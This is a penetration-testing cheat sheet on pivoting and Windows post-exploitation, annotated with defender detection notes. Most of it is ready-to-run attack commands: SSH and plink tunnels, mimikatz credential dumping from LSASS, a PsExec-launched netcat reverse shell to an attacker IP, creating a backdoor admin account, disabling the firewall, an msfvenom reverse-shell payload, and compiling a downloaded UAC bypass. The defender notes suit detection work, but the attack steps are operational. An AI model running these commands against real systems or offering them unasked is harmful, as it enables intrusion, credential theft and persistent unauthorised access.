# Pivoting / port-forwarding notes (rinetd, ssh -L/-R/-D, proxychains, plink).
# Defender note: each of these is a long-lived ssh/plink session carrying -L/-R/-D
# arguments; alert on SSH originating from hosts that normally never do, and on new
# listeners appearing on non-loopback addresses.
apt install rinetd
# rinetd reads its forwarding rules from this file.
cat /etc/rinetd.conf
# Local forward: <LOCAL PORT> on this host -> 127.0.0.1:<TARGET PORT> on the SSH server.
ssh -N -L <LOCAL PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<TARGET IP>
# Local forward via an intermediate hop. <BIND_ADRESS> (placeholder typo: ADDRESS) is
# the interface the listener binds on this side; anything other than 127.0.0.1
# exposes the tunnel to the local network.
ssh -N -L <BIND_ADRESS>:<PORT>:<TARGET IP>:<TARGET PORT> <USERNAME>@<HOP IP>
# Remote forward: the listener is opened on the far side (<ATTACKER IP>).
ssh -N -R <BIND_ADRESS>:<PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<ATTACKER IP>
# sudo is not needed here: 127.0.0.1:9000 is an unprivileged port, and running ssh as
# root uses root's known_hosts/keys instead of the invoking user's.
sudo ssh -N -D 127.0.0.1:9000 <username>@<IP>
# Point proxychains at the SOCKS listener opened above.
vim /etc/proxychains.conf
socks4 127.0.0.1 9000 #Change this value
#prepend proxychains command before every command to send through the proxychain.
# plink: remote forward from a Windows host back to <ATTACKER PORT>. Defender note:
# plink.exe on a workstation that is not an admin jump host is itself a signal.
plink.exe <USER>@<IP> -R <ATTACKER PORT>:<TARGET IP>:<TARGET PORT>
# -J (ProxyJump) chains through <FIRST HOP IP> before opening the SOCKS listener.
ssh -J <USER>@<FIRST HOP IP> -D 127.0.0.1:9000 <USER>@<SECOND IP>
Bring over mimikatz.exe using an SMB server.
# Credential dumping from LSASS. Defender note: LSA Protection (RunAsPPL) and
# Credential Guard block or degrade sekurlsa; detections are typically Security 4688
# with command-line auditing and Sysmon process-access (Event 10) against lsass.exe.
mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full"
# Presumably produces the .pwdump file read on the next line — confirm against the
# tool's output location.
fgdump.exe
# Filename is truncated in these notes ("....."); substitute the real pwdump path.
type .....pwdump
Shell back to my machine as another user using netcat
# Lateral movement via PsExec. Defender note: the password on argv is captured by
# command-line auditing (Security 4688 / Sysmon 1), and the PSEXESVC service install
# shows up as System 7045.
PsExec.exe -u <COMPUTERNAME>\<USERNAME> -p <PASSWORD> \\<COMPUTERNAME> nc.exe <ATTACKER IP> <ATTACKER PORT> -e cmd.exe
#Enable RDP
# Defender note: a write to fDenyTSConnections is a high-fidelity signal; audit this
# key (Sysmon 13 / Security 4657) and pin the value via GPO so it reverts.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Enable more than 1 user login
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
#Add user to RDP group
# Defender note: local account creation is Security 4720 and the group additions are
# 4732; a freshly created account landing in administrators is a classic alert.
net user <USER> <PASS> /add /Y
net localgroup administrators <USER> /add
net localgroup "Remote Desktop Users" <USER> /add>
#Disable firewall
# Defender note: switching every profile off at once is rarely legitimate; alert on
# Windows Firewall policy-change events and enforce profile state centrally.
netsh advfirewall set allprofiles state off
#RDP to machine
xfreerdp /u:<USER> /p:<PASS> /v:<TARGET>
# Unstaged x64 reverse shell. Mitigations: egress filtering toward <IP>:<PORT> and
# application control that refuses an unsigned shell.exe.
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
# Supply-chain risk: this fetches whatever is on a third-party master branch at
# download time — unpinned, unreviewed code that is then compiled and run elevated.
wget https://raw.githubusercontent.com/turbo/zero2hero/master/main.c
#change
# The two C lines below are edits to main.c, not shell. strcat() has no bounds check:
# if curPath is a MAX_PATH-sized buffer (declaration not shown — confirm in main.c),
# GetCurrentDirectory can already fill it and the append can overflow. A bounded
# form (strcat_s / snprintf with the remaining length) avoids that.
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\shell.exe");
# Cross-compiles the UAC bypass. Mitigations: UAC at "Always notify", non-admin
# day-to-day accounts, application control.
x86_64-w64-mingw32-gcc main.c -o bypassuac.exe
# sudo only matters when <PORT> is below 1024. Flags: -l listen, -n no DNS lookups,
# -v verbose, -p port.
sudo nc -lnvp <PORT>